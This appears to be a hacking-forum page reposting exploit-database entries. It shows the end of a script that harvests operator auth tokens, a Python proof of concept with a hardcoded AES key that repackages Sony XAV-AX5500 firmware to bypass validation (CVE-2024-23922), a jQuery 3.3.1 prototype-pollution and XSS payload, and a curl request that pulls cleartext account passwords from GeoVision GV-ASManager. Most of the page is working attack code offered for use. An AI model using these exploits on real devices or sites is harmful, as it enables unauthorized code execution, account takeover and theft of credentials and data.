'None' -> Unrescticted access try: for auth in auths: if auth.permissions: for perm in auth.permissions: if perm.action == "write" and perm.resource.org == None and perm.resource.type == "authorizations": op_tokens.append(auth.token) except Exception as e: logger.error(f"{red}Unable to parse permissions on found authorizations. ERR: " + str(e) + f"{endc}") print(f"{red}Unable to parse permissions on found authorizations. Quitting execution...{endc}") sys.exit(1) logger.info(f"{cyan}Printing all operator auth tokens{endc}") print(f"{cyan}{str(len(op_tokens))} operator tokens found.\n\nListing all operator tokens:\n{endc}") for op_t in op_tokens: print(f"{green}{op_t}{endc}")
  23. HireHackking

    Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution # Date: 11-Feb-2025 # Exploit Author: lkushinada # Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500 # Software Link: https://archive.org/details/xav-ax-5500-v-113 # Version: 1.13 # Tested on: Sony XAV-AX5500 # CVE : CVE-2024-23922 # From NIST CVE Details: # ==== # This vulnerability allows physically present attackers to execute arbitrary code on affected # installations of Sony XAV-AX5500 devices. Authentication is not required to exploit this # vulnerability. The specific flaw exists within the handling of software updates. The issue # results from the lack of proper validation of software update packages. An attacker can leverage # this vulnerability to execute code in the context of the device. # Was ZDI-CAN-22939 # ==== # # Summary # Sony's firmware validation for a number of their XAV-AX products relies on symetric cryptography, # obscurity of their package format, and a weird checksum method instead of any real firmware # signing mechanism. As such, this can be exploited to craft updates which bypass firmware validation # and allow a USB-based attacker to obtain RCE on the infotainment unit. # What's not mentioned in the CVE advisories, is that this method works on the majority of Sony's # infotainment units and products which use a similar chipset or firmware package format. Tested # to work on most firmware versions prior to v2.00. # # Threat Model # An attacker with physical access to an automotive media unit can typically utilize other methods # to achieve a malicious outcome. The reason to investigate the firmware to the extent in this post # is academic, exploratory, and cautionary, i.e. what other systems are protected in a similar # manner? if they are, how trivial is it to bypass? # # Disclaimer # The information in this article is for educational purposes only. # Tampering with an automotive system comes with risks which, if you don't understand, you should # not be undertaking. # THE AUTHORS DISCLAIM ANY AND ALL RESPONSIBILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES ARISING # FROM THE USE OF ANYTHING IN THIS DOCUMENT. # # The Unit # ## Processors # - DAC # - System Management Controller (SMC) # - Applications Processor # - Display Processor # Coming from a mobile and desktop computer environment, one may be use to thinking about # the Applications Processor as the most powerful chip in the system in terms of processing power, # size, power consumption, and system hierarchy. The first oddity of this platform is that the # application processor is not the most powerful; that honor goes to the DAC, a beefy ARM chip on the # board. # The application processor does not appear to be the orchestrator of the components on the system. # The SMC tkes which takes the role of watchdog, power state management, and input (think remote # controls, steering wheel button presses) routing. # For our purposes, it is the Applications processor we're interested in, as it is # the system responsible for updating the unit via USB. # ## Interfaces # We're going to be attacking the unit via USB, as it's the most readily exposed # interface to owners and would-be attackers. # Whilst the applications processor does have a UART interface, the most recent iterations of the # unit do not expose any headers for debugging via UART, and the one active UART line found to be # active was for message passing between the SMC and app processor, not debug purposes. Similarly, no # exposed JTAG interfaces were found to be readily exposed on recent iterations of the unit. Sony's # documentation suggests these are not enabled, but this could not be verified during testing. At the # very least, JTAG was not found to be exposed on an accessible interface. # ## Storage # The boards analyzed had two SPI NOR flash chips, one with an unencrypted firmware image on it. This # firmware was RARd. The contents of SPI flash was analyzed to determine many of the details # discussed in this report. # ## The Updater # Updates are provided on Sony's support website. A ZIP package is provided with three files: # - SHDS1132.up6 # - SHMC1132.u88 # - SHSO1132.fir # The largest of these files (8 meg), the .fir, is in a custom format, and appears encrypted. # The FIR file has a header which contains the date of firmware publication, the strings KRSELCO and # SKIP, a chunk of zeros, and then a highish entropy section, and some repeating patterns of interest: # 00002070 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\| # * # 00002860 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\| # 00744110 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\| # * # 00800020 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\| # ## SPI Flash # Dumping the contents of the SPI flash shows a similar layout, with slightly different offsets: # 00001fe0 10 10 10 10 10 10 10 10 ff ff ff ff ff ff ff ff |................| # 00001ff0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| # * # 000027f0 ff ff ff ff ff ff ff ff ff ff ff ff 00 03 e7 52 |...............R| # 00002800 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......| # # 0007fff0 ff ff ff ff ff ff ff ff ff ff ff ff 00 6c 40 8b |.............l@.| # 00080000 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......| # ... # 00744090 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| # * # 00778000 # # This given the offsets and spacing, we suspect that the .FIR matches the contents of the SPI. # Decompressing the RARs at the 0x2800 and 0x80000, we get the recovery and main applications. # Once we remove the packaging bytes, seeing that the repetive patterns align with FF's, gives # us a strong indication the encryption function is operating in an ECB-style configuration, # giving us an avenue, even if we do not recover the key, to potentially make modifications # to the firmware depending on how the checksum is being calculated. # ## Firmware # The recovery application contains the decompression, decryption and checksum methods. # Putting the recovery_16.bin into ghidra and setting the memory map to load us in at 0x2800, # we start taking a look at the relevant functions by way of: # - looking for known strings (KRSELCO) # - analyizing the logic and looking for obvious "if this passed, begin the update, else fail" # - looking for things that look like encryption (loads of bitshifting math in one function) # Of interest to us, there is: # - 0x0082f4 - a strcmp between KRSELCO and the address the incoming firmware update is at, plus 0x10 # - 0x00897a - a function which sums the total number of bytes until we hit 0xA5A5A5A5 # - 0x02d4ce - the AES decryption function # - 0x040dd4 - strcmp (?) # - 0x040aa4 - memcpy (?) # - 0x046490 - the vendor plus the a number an idiot would use for their luggage, followed by enough # padding zeros to get us to a 16 byte key # This gives us all the information we need, other than making some guesses as to the general package # and header layout of the update package, to craft an update packager that allows arbitrary # modification of the firmware. # # Proof of Concept # The PoC below will take an existing USB firmware update, decrypt and extract the main binary, # pause whilst you make modifications (e.g. changing the logic or modifying a message), and repackage # the update. # ## Requirements # - Unixish system # - WinRar 2.0 (the version the Egyptians built the pyramids with) # ## Usage # cve-2024-23922.py path_to_winrar source.fir output.fir import argparse import sys import os import tempfile import shutil from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.backends import default_backend # Filenames as found in the .FIR MAIN_BINARY_NAME="main_16.bin" MAIN_RAR_NAME="main_16.rar" DECRYPTED_FILE_NAME="decrypt.bin" ENCRYPTED_FILE_NAME="encrypt.bin" # Offsets in the .FIR HEADER_LENGTH=0x80 RECOVERY_OFFSET=0x2800 MAIN_OFFSET=0x80000 CHECKSUM_OFFSET=0x800000-0x10 CHECKSUM_SIZE=0x4 RAR_LENGTH_OFFSET=0x4 RAR_LENGTH_SIZE=0x4 # From 0x46490 in recovery_16.bin ENCRYPTION_KEY=b'\x54\x41\x4d\x55\x4c\x31\x32\x33\x34\x00\x00\x00\x00\x00\x00\x00' def decrypt_file(input_file, output_file): backend = default_backend() cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend) decryptor = cipher.decryptor() with open(input_file, 'rb') as file: ciphertext = file.read() # Strip the unencrypted header ciphertext = ciphertext[HEADER_LENGTH:] decrypted_data = decryptor.update(ciphertext) + decryptor.finalize() with open(output_file, 'wb') as file: file.write(decrypted_data) def aes_encrypt_file(input_file, output_file): backend = default_backend() cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend) encryptor = cipher.encryptor() with open(input_file, 'rb') as file: plaintext = file.read() ciphertext = encryptor.update(plaintext) + encryptor.finalize() with open(output_file, 'wb') as file: file.write(ciphertext) def get_sony_32(data): csum = int() for i in data: csum = csum + i return csum % 2147483648 # 2^31 def validate_args(winrar_path, source_file, destination_file): # Check if the WinRAR executable exists and is a file if not os.path.isfile(winrar_path) or not os.access(winrar_path, os.X_OK): print(f"[x] Error: The specified WinRAR path '{winrar_path}' is not a valid executable.") sys.exit(1) # Check if the source file exists if not os.path.isfile(source_file): print(f"[x] Error: The specified source file '{source_file}' does not exist.") sys.exit(1) # Read 8 bytes from offset 0x10 in the source file try: with open(source_file, 'rb') as f: f.seek(0x10) signature = f.read(8) if signature != b'KRSELECO': print(f"[x] Error: The source file '{source_file}' does not contain the expected signature.") sys.exit(1) except Exception as e: print(f"[x] Error: Failed to read from '{source_file}': {e}") sys.exit(1) # Check if the destination file already exists if os.path.exists(destination_file): print(f"[x] Error: The destination file '{destination_file}' already exists.") sys.exit(1) def main(): parser = argparse.ArgumentParser(description="CVE-2024-23922 Sony XAV-AX5500 Firmware Modifier") parser.add_argument("winrar_path", help="Path to WinRAR 2.0 executable (yes, the ancient one)") parser.add_argument("source_file", help="Path to original .FIR file") parser.add_argument("destination_file", help="Path to write the modified .FIR file to") args = parser.parse_args() validate_args(args.winrar_path, args.source_file, args.destination_file) RAR_2_PATH = args.winrar_path GOOD_FIRMWARE_FILE = args.source_file DESTINATION_FIRMWARE_FILE = args.destination_file # make temporary directory workdir = tempfile.mkdtemp(prefix="sony_firmware_modifications") # copy the good firmware file into the temp directory temp_fir_file = os.path.join(workdir, os.path.basename(GOOD_FIRMWARE_FILE)) shutil.copyfile(GOOD_FIRMWARE_FILE, temp_fir_file) print("[+] Cutting the head off and decrypting the contents") decrypted_file_path = os.path.join(workdir, DECRYPTED_FILE_NAME) decrypt_file(input_file=temp_fir_file, output_file=decrypted_file_path) print("[+] Dump out the rar file") with open(decrypted_file_path, 'rb') as file: # right before the rar file there is a 4 byte length header for the rar file. get that. file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET) original_rar_length = int.from_bytes(file.read(RAR_LENGTH_SIZE), "big") rar_file_bytes = file.read(original_rar_length) # now dump that out rar_file_path=os.path.join(workdir, MAIN_RAR_NAME) with open(rar_file_path, 'wb') as rarfile: rarfile.write(rar_file_bytes) # check that the stat of the file matches what the header told us dumped_rar_size = os.stat(rar_file_path).st_size if dumped_rar_size != original_rar_length: print("[!] extracted filesizes dont match, there may be corruption", dumped_rar_size, original_rar_length) print("[+] Extracting the main binary from the rar file") os.system("unrar x " + rar_file_path + " " + workdir) print("[!] Okay, I'm now going to wait until you have had a chance to make modifications") print("Please modify this file:", os.path.join(workdir, MAIN_BINARY_NAME)) input() print("[+] Continuing") print("[+] Putting your main binary back into the rar file") os.system("wine " + RAR_2_PATH + " u -tk -ep " + rar_file_path + " " + workdir + "/" + MAIN_BINARY_NAME) # we could fix this by writing some FFs new_rar_size=os.stat(rar_file_path).st_size if dumped_rar_size > os.stat(rar_file_path).st_size: print("[!!] The rar size is smaller than the old one. This might cause a problem.") print("[!!] Push any key to continue, ctrl+c to abort") input() with open(decrypted_file_path, 'r+b') as file: # right before the rar file there is a 4 byte length header for the rar file. go back there file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET) # overwrite the old size with the new size file.write(new_rar_size.to_bytes(RAR_LENGTH_SIZE, "big")) print("[+] Deleting the old rar from the main container") # delete the old rar from the main container by FFing it up file.write(b'\xFF'*original_rar_length) # seek back to the start file.seek(MAIN_OFFSET) print("[+] Loading the new rar back into the main container") with open(rar_file_path, 'rb') as rarfile: new_rarfile_bytes = rarfile.read() file.write(new_rarfile_bytes) print("[+] Updating Checksum") with open(decrypted_file_path, 'rb') as file: contents = file.read() contents = contents[:-0x0010] s32_sum = get_sony_32(contents) with open(decrypted_file_path, 'r+b') as file: file.seek(CHECKSUM_OFFSET) # read out the current checksum old_checksum_bytes=file.read(CHECKSUM_SIZE) print("old checksum:", int.from_bytes(old_checksum_bytes, "big"), old_checksum_bytes) # go back and update it with new checksum print("new checksum:", s32_sum, hex(s32_sum)) new_checksum_bytes=s32_sum.to_bytes(CHECKSUM_SIZE, "big") file.seek(CHECKSUM_OFFSET) file.write(new_checksum_bytes) print("[+] Encrypting the main container back up") encrypted_file_path = os.path.join(workdir, ENCRYPTED_FILE_NAME) aes_encrypt_file(decrypted_file_path, encrypted_file_path) print("[+] Reattaching the main container to the header and writing to dest") with open(DESTINATION_FIRMWARE_FILE, 'wb') as file: with open(temp_fir_file, 'rb') as firfile: header = firfile.read(HEADER_LENGTH) file.write(header) with open(encrypted_file_path, 'rb') as encfile: enc_contents = encfile.read() file.write(enc_contents) print("[+] DONE!!! Any key to delete temp files, ctrl+c to keep them.") input() shutil.rmtree(workdir) if __name__ == "__main__": main()
  24. HireHackking

    jQuery 3.3.1 - Prototype Pollution & XSS Exploit

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: jQuery Prototype Pollution & XSS Exploit (CVE-2019-11358 & CVE-2020-7656) # Google Dork: N/A # Date: 2025-02-13 # Exploit Author: xOryus # Vendor Homepage: https://jquery.com # Software Link: https://code.jquery.com/jquery-3.3.1.min.js # Version: 3.3.1 # Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112 # CVE : CVE-2019-11358, CVE-2020-7656 # Category: WebApps # Description: # This exploit abuses two vulnerabilities in jQuery: # - CVE-2020-7656: XSS via improper script handling # - CVE-2019-11358: Prototype Pollution leading to XSS # By injecting payloads into a vulnerable page using jQuery <3.4.X, attackers can execute arbitrary JavaScript in the victim's browser. # # Usage: # 1. Load this script in a page that includes jQuery 3.3.1 # 2. Observe two XSS alerts via script injection and prototype pollution. # PoC (Proof of Concept): # ------------------------------------ /* * Exploit for CVE-2020-7656 and CVE-2019-11358 * Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X */ COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12) // 1. Load vulnerable jQuery (version 3.3.1) const script = document.createElement('script'); script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"; document.head.appendChild(script); // 2. Function to execute after jQuery is loaded script.onload = function() { console.log("[+] Vulnerable jQuery loaded!"); // 3. Inject malicious content for XSS (CVE-2020-7656) const maliciousContent = "<script>alert('XSS via CVE-2020-7656: ' + document.domain)</script >"; // Space after </script> $('body').append(maliciousContent); console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed."); // 4. Exploit Prototype Pollution (CVE-2019-11358) const defaultConfig = { "backLink": "<a href='https://example.com'>Go Back</a>" }; const maliciousParams = { "__proto__": { "backLink": "<svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')>" } }; // 5. Merge objects using vulnerable $.extend let config = $.extend(true, defaultConfig, maliciousParams); console.log("[+] Prototype Pollution executed via $.extend()."); // 6. Create a container to inject malicious content const container = document.createElement('div'); container.id = 'backLinkContainer'; document.body.appendChild(container); // 7. Inject malicious content into the DOM $('#backLinkContainer').html(config.backLink); console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed."); }; // 8. Instruction message console.log("[*] Script injected. Waiting for jQuery to load...");
  25. HireHackking

    GeoVision GV-ASManager 6.1.0.0 - Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Information Disclosure in GeoVision GV-ASManager # Google Dork: inurl:"ASWeb/Login" # Date: 02-FEB-2025 # Exploit Author: Giorgi Dograshvili [DRAGOWN] # Vendor Homepage: https://www.geovision.com.tw/ # Software Link: https://www.geovision.com.tw/download/product/ # Version: 6.1.0.0 or less # Tested on: Windows 10 | Kali Linux # CVE : CVE-2024-56902 # PoC: https://github.com/DRAGOWN/CVE-2024-56902 Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less. Requirements To perform successful attack an attacker requires: - GeoVision ASManager version 6.1.0.0 or less - Network access to the GV-ASManager web application (there are cases when there are public access) - Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>) Impact The vulnerability can be leveraged to perform the following unauthorized actions: A low privilege account is able to: - Enumerate user accounts - Retrieve cleartext password of any account in GV-ASManager. After reusing the retrieved password, an attacker will be able to: - Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc. - Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc. - Disrupt and disconnect services such as monitoring cameras, access controls. - Clone and duplicate access control data for further attack scenarios. - Reusing retrieved password in other digital assets of the organization. cURL script: curl --path-as-is -i -s -k -X $'POST' \ -H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \ -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \ --data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \ $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf' After a successful attack, you will get access to: - ASWeb - Access & Security Management - TAWeb - Time and Attendance Management - VMWeb - Visitor Management - ASManager - Access & Security Management software in OS